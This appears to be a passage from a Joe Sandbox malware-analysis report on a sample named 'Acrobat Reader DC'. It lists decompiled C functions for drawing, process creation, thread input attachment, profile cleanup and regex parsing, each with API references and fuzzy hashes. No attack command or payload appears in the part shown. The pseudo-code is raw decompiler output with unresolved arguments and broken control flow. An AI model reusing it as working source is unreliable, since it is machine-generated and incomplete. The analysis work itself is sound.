						EndPath(_t19);
						 *0x4a86ec = 0;
					}
					return StrokePath(_t19);
				}
				return _t9;
			}





                                  0x004472f9
                                  0x004472fc
                                  0x00447307
                                  0x00447317
                                  0x00447326
                                  0x00447333
                                  0x00447336
                                  0x0044733c
                                  0x0044733c
                                  0x00000000
                                  0x00447344
                                  0x0044734c

                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                  • LineTo.GDI32(?,?,?), ref: 00447326
                                  • EndPath.GDI32(?), ref: 00447336
                                  • StrokePath.GDI32(?), ref: 00447344
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                  • String ID:
                                  • API String ID: 2783949968-0
                                  • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                  • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                  • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                  • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00430B0F Relevance: 6.0, APIs: 4, Instructions: 34processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00430B0F(WCHAR* _a4) {
				int _t5;
				void* _t8;

				E00412F40(0x4a9568, 0, 0x44);
				E00412F40(0x4a9554, 0, 0x10);
				0x4a9568->cb = 0x44;
				 *0x4a9594 = 1;
				 *0x4a9598 = 1;
				_t5 = CreateProcessW(0, _a4, 0, 0, 0, 0x20, 0, 0, 0x4a9568, 0x4a9554);
				if(_t5 != 0) {
					_t8 = 0x4a9554->hProcess; // 0x0
					return CloseHandle(_t8);
				}
				return _t5;
			}





                                  0x00430b1b
                                  0x00430b29
                                  0x00430b52
                                  0x00430b5c
                                  0x00430b66
                                  0x00430b6c
                                  0x00430b74
                                  0x00430b76
                                  0x00000000
                                  0x00430b7d
                                  0x00430b84

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$CloseCreateHandleProcess
                                  • String ID:
                                  • API String ID: 3277943733-0
                                  • Opcode ID: e088a7bf58335eb6944ed34f3b8eeab294ed842f4155ecbba55165c5b0624384
                                  • Instruction ID: 3470c143a95c0eef1b65460b57efe1f3fa5fad32f127a08d2907f48b6a67c281
                                  • Opcode Fuzzy Hash: e088a7bf58335eb6944ed34f3b8eeab294ed842f4155ecbba55165c5b0624384
                                  • Instruction Fuzzy Hash: DFF01C72BC034476F7259B59DD47F853A689719F48F20002AB7086E1E3C6F9B850D7AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 66%
                                  			E0043646A(struct HWND__* _a4, long _a8) {
				long _t4;
				long _t8;
				struct HWND__* _t9;

				_t9 = _a4;
				if(_a8 != 1) {
					_push(0);
					L4:
					_t4 = GetWindowThreadProcessId(_t9, 0);
					return AttachThreadInput(GetCurrentThreadId(), _t4, ??);
				}
				_t8 = SendMessageTimeoutW(_t9, 0, 0, 0, 2, 0x1388,  &_a8);
				if(_t8 != 0) {
					_push(1);
					goto L4;
				}
				return _t8;
			}






                                  0x00436472
                                  0x00436475
                                  0x00436497
                                  0x00436499
                                  0x0043649c
                                  0x00000000
                                  0x004364aa
                                  0x00436489
                                  0x00436491
                                  0x00436493
                                  0x00000000
                                  0x00436493
                                  0x004364b2

                                  APIs
                                  • SendMessageTimeoutW.USER32 ref: 00436489
                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                  • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                  • AttachThreadInput.USER32(00000000), ref: 004364AA
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                  • String ID:
                                  • API String ID: 2710830443-0
                                  • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                  • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                  • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                  • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00436C2B(void** _a4) {
				void** _t16;

				_t16 = _a4;
				WaitForSingleObject( *_t16, 0xffffffff);
				__imp__UnloadUserProfile(_t16[2], _t16[1]);
				CloseHandle(_t16[2]);
				CloseHandle( *_t16);
				E00436BA9(_t16);
				return 0;
			}




                                  0x00436c2f
                                  0x00436c38
                                  0x00436c46
                                  0x00436c56
                                  0x00436c5b
                                  0x00436c5e
                                  0x00436c6b

                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                  • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                    • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                    • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                  • String ID:
                                  • API String ID: 146765662-0
                                  • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                  • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                  • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                  • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041514D() {
				void* _t3;
				void* _t6;
				void* _t8;
				void* _t9;

				_t9 = E004179F0(_t6, _t8);
				if(_t9 != 0) {
					_t3 =  *(_t9 + 4);
					if(_t3 != 0xffffffff) {
						CloseHandle(_t3);
					}
					E00417BB2(_t9);
				}
				ExitThread(0);
			}







                                  0x00415155
                                  0x00415159
                                  0x0041515b
                                  0x00415161
                                  0x00415164
                                  0x00415164
                                  0x0041516b
                                  0x00415170
                                  0x00415173

                                  APIs
                                  • __getptd_noexit.LIBCMT ref: 00415150
                                    • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                    • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                    • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                    • Part of subcall function 004179F0: __initptd.LIBCMT ref: 00417A3F
                                    • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                    • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                  • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                  • __freeptd.LIBCMT ref: 0041516B
                                  • ExitThread.KERNEL32 ref: 00415173
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit__initptd
                                  • String ID:
                                  • API String ID: 2246029678-0
                                  • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                  • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                  • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                  • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0042F373(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
				signed char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t82;
				signed int _t83;
				signed char _t85;
				intOrPtr _t86;
				intOrPtr _t88;
				signed char _t89;
				void* _t93;
				signed int _t94;
				signed char _t96;
				signed char _t97;
				signed char _t98;
				void* _t99;
				signed char _t100;
				signed char _t101;
				signed int _t102;
				void* _t105;
				signed char _t107;
				signed char _t108;
				signed int _t109;
				intOrPtr* _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t118;
				signed char _t121;
				signed char _t122;
				signed char _t123;
				signed char* _t124;
				signed char _t137;
				intOrPtr _t138;
				intOrPtr _t139;
				signed char* _t140;
				void* _t141;

				_t111 = _a28;
				_t140 =  *_a4;
				_t82 =  *_t111;
				_t113 = _t82;
				_v8 = _t140;
				_t138 = _a12;
				_v20 = _t113;
				_v12 = _t113;
				_v16 = 0;
				if( *_t140 != 0x28) {
					L35:
					_t139 = _a8;
					if(_t140 >=  *((intOrPtr*)(_t139 + 0x1c))) {
						goto L101;
					} else {
						while(1) {
							_t85 =  *_t140;
							_t114 = _v12;
							if(_t85 != 0x5c) {
								goto L45;
							}
							_t140 =  &(_t140[1]);
							_v8 = _t140;
							_t100 =  *_t140;
							if(_t100 == 0) {
								goto L101;
							} else {
								if(_t100 != 0x51) {
									L96:
									_t140 =  &(_t140[1]);
									_v8 = _t140;
									if(_t140 >=  *((intOrPtr*)(_t139 + 0x1c))) {
										goto L101;
									} else {
										_t111 = _a28;
										continue;
									}
								} else {
									while(1) {
										_t140 =  &(_t140[1]);
										_v8 = _t140;
										_t101 =  *_t140;
										if(_t101 == 0) {
											goto L101;
										}
										if(_t101 != 0x5c) {
											continue;
										} else {
											if(_t101 == 0) {
												goto L101;
											} else {
												_t140 =  &(_t140[1]);
												_v8 = _t140;
												if( *_t140 != 0x45) {
													continue;
												} else {
													goto L96;
												}
											}
										}
										goto L107;
									}
									goto L101;
								}
							}
							goto L107;
							L45:
							if(_t85 != 0x5b) {
								_t125 = _a20;
								if(_a20 == 0 || _t85 != 0x23) {
									if(_t85 != 0x28) {
										if(_t85 == 0x29) {
											if(_v16 != 0 &&  *_t111 < _t114) {
												 *_t111 = _t114;
											}
											goto L101;
										} else {
											if(_t85 == 0x7c && _v16 != 0) {
												_t86 =  *_t111;
												if(_t86 > _t114) {
													_v12 = _t86;
												}
												 *_t111 = _v20;
											}
											goto L96;
										}
									} else {
										_t88 = E0042F373( &_v8, _t139, _a12, _a16, _t125, _a24, _t111);
										_t141 = _t141 + 0x1c;
										if(_t88 > 0) {
											goto L106;
										} else {
											_t140 = _v8;
											if( *_t140 == 0) {
												goto L101;
											} else {
												goto L96;
											}
										}
									}
								} else {
									_t140 =  &(_t140[1]);
									_v8 = _t140;
									_t89 =  *_t140;
									if(_t89 == 0) {
										goto L101;
									} else {
										do {
											_t117 =  *((intOrPtr*)(_t139 + 0x58));
											if( *((intOrPtr*)(_t139 + 0x58)) == 0) {
												_t118 =  *((intOrPtr*)(_t139 + 0x5c));
												if(_t140 >  *((intOrPtr*)(_t139 + 0x1c)) - _t118 || _t89 !=  *((intOrPtr*)(_t139 + 0x60)) || _t118 != 1 && _t140[1] !=  *((intOrPtr*)(_t139 + 0x61))) {
													goto L81;
												} else {
													goto L75;
												}
											} else {
												_t92 =  *((intOrPtr*)(_t139 + 0x1c));
												if(_t140 >=  *((intOrPtr*)(_t139 + 0x1c))) {
													L81:
													_t140 =  &(_t140[1]);
													_v8 = _t140;
													if(_a24 != 0 && ( *_t140 & 0x000000c0) == 0x80) {
														do {
															_t140 =  &(_t140[1]);
															_v8 = _t140;
														} while (( *_t140 & 0x000000c0) == 0x80);
													}
													goto L84;
												} else {
													_t53 = _t139 + 0x5c; // 0x5c
													_t93 = E0042E9B5(_t140, _t117, _t92, _t53, _a24);
													_t141 = _t141 + 0x14;
													if(_t93 == 0) {
														goto L81;
													} else {
														L75:
														_t140 =  &(_t140[ *((intOrPtr*)(_t139 + 0x5c)) - 1]);
														_v8 = _t140;
														if( *_t140 == 0) {
															goto L101;
														} else {
															goto L96;
														}
													}
												}
											}
											goto L107;
											L84:
											_t89 =  *_t140;
										} while (_t89 != 0);
										_t94 = _a4;
										 *_t94 = _t140;
										return _t94 | 0xffffffff;
									}
								}
							} else {
								_t112 = 0;
								while(1) {
									L47:
									_t96 = _t140[1];
									if(_t96 != 0x5c) {
										break;
									}
									_t140 =  &(_t140[2]);
									if( *_t140 != 0x45) {
										_t99 = E00416931(_t114, _t140, "Q\\E", 3);
										_t140 = _v8;
										_t141 = _t141 + 0xc;
										if(_t99 == 0) {
											_t140 =  &(_t140[4]);
											_v8 = _t140;
											continue;
										}
									} else {
										_v8 = _t140;
										continue;
									}
									L55:
									if(_t140[1] == 0x5d && ( *(_t139 + 0x44) & 0x02000000) == 0) {
										_t140 =  &(_t140[1]);
									}
									_t140 =  &(_t140[1]);
									_v8 = _t140;
									_t83 =  *_t140;
									if(_t83 == 0x5d) {
										goto L96;
									} else {
										while(_t83 != 0) {
											if(_t83 != 0x5c) {
												L67:
												_t140 =  &(_t140[1]);
												_v8 = _t140;
												_t83 =  *_t140;
												if(_t83 != 0x5d) {
													continue;
												} else {
													goto L96;
												}
											} else {
												_t140 =  &(_t140[1]);
												_v8 = _t140;
												_t97 =  *_t140;
												if(_t97 == 0) {
													goto L101;
												} else {
													if(_t97 != 0x51) {
														goto L67;
													} else {
														while(1) {
															_t140 =  &(_t140[1]);
															_v8 = _t140;
															_t98 =  *_t140;
															if(_t98 == 0) {
																goto L101;
															}
															if(_t98 != 0x5c) {
																continue;
															} else {
																if(_t98 == 0) {
																	goto L101;
																} else {
																	_t140 =  &(_t140[1]);
																	_v8 = _t140;
																	if( *_t140 != 0x45) {
																		continue;
																	} else {
																		goto L67;
																	}
																}
															}
															goto L107;
														}
														goto L101;
													}
												}
											}
											goto L107;
										}
										goto L102;
									}
									goto L107;
								}
								if(_t112 == 0 && _t96 == 0x5e) {
									_t140 =  &(_t140[1]);
									_t112 = 1;
									_v8 = _t140;
									goto L47;
								}
								goto L55;
							}
							goto L107;
						}
					}
				} else {
					_t121 = _t140[1];
					if(_t121 != 0x2a) {
						if(_t121 == 0x3f) {
							_t122 = _t140[2];
							if(_t122 != 0x7c) {
								if(_t122 != 0x23) {
									_t140 =  &(_t140[2]);
									_v8 = _t140;
									if(_t122 != 0x28) {
										if( *_t140 == 0x50) {
											_t140 =  &(_t140[1]);
											_v8 = _t140;
										}
										_t123 =  *_t140;
										if(_t123 != 0x3c) {
											L23:
											if(_t123 != 0x27) {
												goto L35;
											} else {
												goto L24;
											}
										} else {
											_t137 = _t140[1];
											if(_t137 == 0x21 || _t137 == 0x3d) {
												goto L23;
											} else {
												L24:
												_t88 = _t82 + 1;
												 *_t111 = _t88;
												if(_t138 != 0 || _t88 != _a16) {
													_t102 =  *_t140 & 0x000000ff;
													_t140 =  &(_t140[1]);
													_v8 = _t140;
													if(_t102 == 0x3c) {
														_t102 = 0x3e;
													}
													_t124 = _t140;
													while(( *_t140 & 0x000000ff) != _t102) {
														_t140 =  &(_t140[1]);
														_v8 = _t140;
													}
													if(_t138 == 0 || _a16 != _t140 - _t124) {
														goto L35;
													} else {
														_t105 = E00416931(_t124, _t138, _t124, _a16);
														_t141 = _t141 + 0xc;
														if(_t105 != 0) {
															_t140 = _v8;
															goto L35;
														} else {
															return  *_t111;
														}
													}
												} else {
													goto L106;
												}
											}
										}
									} else {
										if(_t140[1] != 0x3f) {
											_t107 =  *_t140;
											if(_t107 != 0) {
												while(_t107 != 0x29) {
													_t140 =  &(_t140[1]);
													_v8 = _t140;
													_t107 =  *_t140;
													if(_t107 != 0) {
														continue;
													} else {
													}
													goto L35;
												}
												if( *_t140 != 0) {
													goto L17;
												}
											}
										}
										goto L35;
									}
								} else {
									_t140 =  &(_t140[3]);
									_v8 = _t140;
									_t108 =  *_t140;
									if(_t108 == 0) {
										L101:
										_t83 = _a4;
										 *_t83 = _t140;
										L102:
										return _t83 | 0xffffffff;
									} else {
										while(_t108 != 0x29) {
											_t140 =  &(_t140[1]);
											_v8 = _t140;
											_t108 =  *_t140;
											if(_t108 != 0) {
												continue;
											} else {
												_t109 = _a4;
												 *_t109 = _t140;
												return _t109 | 0xffffffff;
											}
											goto L107;
										}
										goto L101;
									}
								}
							} else {
								_t140 =  &(_t140[3]);
								_v8 = _t140;
								_v16 = 1;
								goto L35;
							}
						} else {
							_t88 = _t82 + 1;
							 *_t111 = _t88;
							if(_t138 != 0 || _t88 != _a16) {
								L17:
								_t140 =  &(_t140[1]);
								_v8 = _t140;
								goto L35;
							} else {
								L106:
								return _t88;
							}
						}
					} else {
						_t140 =  &(_t140[2]);
						_v8 = _t140;
						goto L35;
					}
				}
				L107:
			}








































                                  0x0042f37d
                                  0x0042f381
                                  0x0042f383
                                  0x0042f385
                                  0x0042f387
                                  0x0042f38e
                                  0x0042f391
                                  0x0042f394
                                  0x0042f397
                                  0x0042f39e
                                  0x0042f4d1
                                  0x0042f4d1
                                  0x0042f4d7
                                  0x00000000
                                  0x00000000
                                  0x0042f4dd
                                  0x0042f4dd
                                  0x0042f4df
                                  0x0042f4e4
                                  0x00000000
                                  0x00000000
                                  0x0042f4e6
                                  0x0042f4e7
                                  0x0042f4ea
                                  0x0042f4ee
                                  0x00000000
                                  0x0042f4f4
                                  0x0042f4f6
                                  0x0042f6e9
                                  0x0042f6e9
                                  0x0042f6ea
                                  0x0042f6f0
                                  0x00000000
                                  0x0042f6f2
                                  0x0042f6f2
                                  0x00000000
                                  0x0042f6f2
                                  0x0042f503
                                  0x0042f503
                                  0x0042f503
                                  0x0042f504
                                  0x0042f507
                                  0x0042f50b
                                  0x00000000
                                  0x00000000
                                  0x0042f513
                                  0x00000000
                                  0x0042f515
                                  0x0042f517
                                  0x00000000
                                  0x0042f51d
                                  0x0042f51d
                                  0x0042f51e
                                  0x0042f524
                                  0x00000000
                                  0x0042f526
                                  0x00000000
                                  0x0042f526
                                  0x0042f524
                                  0x0042f517
                                  0x00000000
                                  0x0042f513
                                  0x00000000
                                  0x0042f503
                                  0x0042f4f6
                                  0x00000000
                                  0x0042f52b
                                  0x0042f52d
                                  0x0042f5e9
                                  0x0042f5ee
                                  0x0042f6a2
                                  0x0042f6cf
                                  0x0042f6fe
                                  0x0042f704
                                  0x0042f704
                                  0x00000000
                                  0x0042f6d1
                                  0x0042f6d3
                                  0x0042f6db
                                  0x0042f6df
                                  0x0042f6e1
                                  0x0042f6e1
                                  0x0042f6e7
                                  0x0042f6e7
                                  0x00000000
                                  0x0042f6d3
                                  0x0042f6a4
                                  0x0042f6b7
                                  0x0042f6bc
                                  0x0042f6c1
                                  0x00000000
                                  0x0042f6c3
                                  0x0042f6c3
                                  0x0042f6c9
                                  0x00000000
                                  0x0042f6cb
                                  0x00000000
                                  0x0042f6cb
                                  0x0042f6c9
                                  0x0042f6c1
                                  0x0042f5fc
                                  0x0042f5fc
                                  0x0042f5fd
                                  0x0042f600
                                  0x0042f604
                                  0x00000000
                                  0x0042f60a
                                  0x0042f60a
                                  0x0042f60a
                                  0x0042f60f
                                  0x0042f647
                                  0x0042f651
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042f611
                                  0x0042f611
                                  0x0042f616
                                  0x0042f665
                                  0x0042f665
                                  0x0042f66a
                                  0x0042f66d
                                  0x0042f679
                                  0x0042f679
                                  0x0042f67a
                                  0x0042f682
                                  0x0042f679
                                  0x00000000
                                  0x0042f618
                                  0x0042f61c
                                  0x0042f623
                                  0x0042f628
                                  0x0042f62d
                                  0x00000000
                                  0x0042f62f
                                  0x0042f62f
                                  0x0042f632
                                  0x0042f636
                                  0x0042f63c
                                  0x00000000
                                  0x0042f642
                                  0x00000000
                                  0x0042f642
                                  0x0042f63c
                                  0x0042f62d
                                  0x0042f616
                                  0x00000000
                                  0x0042f687
                                  0x0042f687
                                  0x0042f689
                                  0x0042f691
                                  0x0042f695
                                  0x0042f69f
                                  0x0042f69f
                                  0x0042f604
                                  0x0042f533
                                  0x0042f533
                                  0x0042f535
                                  0x0042f535
                                  0x0042f535
                                  0x0042f53a
                                  0x00000000
                                  0x00000000
                                  0x0042f53c
                                  0x0042f542
                                  0x0042f551
                                  0x0042f556
                                  0x0042f559
                                  0x0042f55e
                                  0x0042f560
                                  0x0042f563
                                  0x00000000
                                  0x0042f563
                                  0x0042f544
                                  0x0042f544
                                  0x00000000
                                  0x0042f544
                                  0x0042f57b
                                  0x0042f57f
                                  0x0042f58a
                                  0x0042f58a
                                  0x0042f58b
                                  0x0042f58c
                                  0x0042f58f
                                  0x0042f593
                                  0x00000000
                                  0x0042f599
                                  0x0042f599
                                  0x0042f5a3
                                  0x0042f5da
                                  0x0042f5da
                                  0x0042f5db
                                  0x0042f5de
                                  0x0042f5e2
                                  0x00000000
                                  0x0042f5e4
                                  0x00000000
                                  0x0042f5e4
                                  0x0042f5a5
                                  0x0042f5a5
                                  0x0042f5a6
                                  0x0042f5a9
                                  0x0042f5ad
                                  0x00000000
                                  0x0042f5b3
                                  0x0042f5b5
                                  0x00000000
                                  0x0042f5b7
                                  0x0042f5b7
                                  0x0042f5b7
                                  0x0042f5b8
                                  0x0042f5bb
                                  0x0042f5bf
                                  0x00000000
                                  0x00000000
                                  0x0042f5c7
                                  0x00000000
                                  0x0042f5c9
                                  0x0042f5cb
                                  0x00000000
                                  0x0042f5d1
                                  0x0042f5d1
                                  0x0042f5d2
                                  0x0042f5d8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042f5d8
                                  0x0042f5cb
                                  0x00000000
                                  0x0042f5c7
                                  0x00000000
                                  0x0042f5b7
                                  0x0042f5b5
                                  0x0042f5ad
                                  0x00000000
                                  0x0042f5a3
                                  0x00000000
                                  0x0042f599
                                  0x00000000
                                  0x0042f593
                                  0x0042f56a
                                  0x0042f570
                                  0x0042f571
                                  0x0042f576
                                  0x00000000
                                  0x0042f576
                                  0x00000000
                                  0x0042f56a
                                  0x00000000
                                  0x0042f52d
                                  0x0042f4dd
                                  0x0042f3a4
                                  0x0042f3a4
                                  0x0042f3aa
                                  0x0042f718
                                  0x0042f3bb
                                  0x0042f3c1
                                  0x0042f3d8
                                  0x0042f40b
                                  0x0042f40e
                                  0x0042f414
                                  0x0042f452
                                  0x0042f454
                                  0x0042f455
                                  0x0042f455
                                  0x0042f458
                                  0x0042f45d
                                  0x0042f46c
                                  0x0042f46f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042f45f
                                  0x0042f45f
                                  0x0042f465
                                  0x00000000
                                  0x0042f471
                                  0x0042f471
                                  0x0042f471
                                  0x0042f472
                                  0x0042f476
                                  0x0042f481
                                  0x0042f484
                                  0x0042f485
                                  0x0042f48b
                                  0x0042f48d
                                  0x0042f48d
                                  0x0042f495
                                  0x0042f499
                                  0x0042f49b
                                  0x0042f49c
                                  0x0042f4a2
                                  0x0042f4a8
                                  0x00000000
                                  0x0042f4b3
                                  0x0042f4b9
                                  0x0042f4be
                                  0x0042f4c3
                                  0x0042f4ce
                                  0x00000000
                                  0x0042f4c5
                                  0x0042f4cd
                                  0x0042f4cd
                                  0x0042f4c3
                                  0x00000000
                                  0x00000000
                                  0x00000000
